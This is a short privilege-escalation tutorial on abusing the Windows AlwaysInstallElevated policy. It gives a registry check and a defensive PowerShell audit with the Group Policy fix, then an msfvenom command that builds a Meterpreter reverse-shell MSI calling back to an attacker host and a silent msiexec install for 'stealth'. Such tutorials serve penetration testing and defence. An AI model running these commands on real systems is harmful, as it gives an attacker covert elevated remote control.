If Windows has been configured to allow MSI packages to install with elevated privileges, then we can simply create a malicious MSI package and run it with those elevated privileges.
Detecting via the registry
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
Note the 0x1 indicating that it is turned on.
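A defender-side audit of the same setting, as an added example that is not part of the original page. Windows honours this policy only when the AlwaysInstallElevated value is 1 under both HKLM and HKCU, so the script reads both hives of the current user; the function name Get-AlwaysInstallElevated is made up for this example.

```powershell
# Added example: audit the AlwaysInstallElevated policy in both hives.
# The policy is effective only when the value is 1 under HKLM *and* HKCU.
function Get-AlwaysInstallElevated {   # hypothetical helper name
    $paths = @(
        'HKLM:\Software\Policies\Microsoft\Windows\Installer',
        'HKCU:\Software\Policies\Microsoft\Windows\Installer'
    )
    foreach ($path in $paths) {
        # A missing key or value means the policy is not configured (off).
        $item = Get-ItemProperty -Path $path -Name AlwaysInstallElevated `
                    -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Path    = $path
            Value   = if ($item) { $item.AlwaysInstallElevated } else { $null }
            Enabled = ($item -and $item.AlwaysInstallElevated -eq 1)
        }
    }
}

$results = @(Get-AlwaysInstallElevated)
$results | Format-Table -AutoSize

$enabled = @($results | Where-Object { $_.Enabled })
if ($enabled.Count -eq 2) {
    Write-Warning ('AlwaysInstallElevated is on in HKLM and HKCU: ' +
                   'any user can install MSI packages with elevated privileges.')
} elseif ($enabled.Count -eq 1) {
    Write-Output 'Set in one hive only: not effective, but the value should still be cleared.'
} else {
    Write-Output 'AlwaysInstallElevated is not enabled.'
}
```

The setting corresponds to the Group Policy "Always install with elevated privileges" under Windows Components > Windows Installer, which exists in both Computer Configuration and User Configuration; setting it to Disabled or Not Configured in both closes this path.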
Create a malicious MSI package:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<connect ip> -f msi -o setup.msi
Start a multi handler in msfconsole and open the MSI package in quiet mode, with no user interface or status messages (stealth):
msiexec /quiet /qn /i C:\Temp\setup.msi
You will now have an elevated Meterpreter session.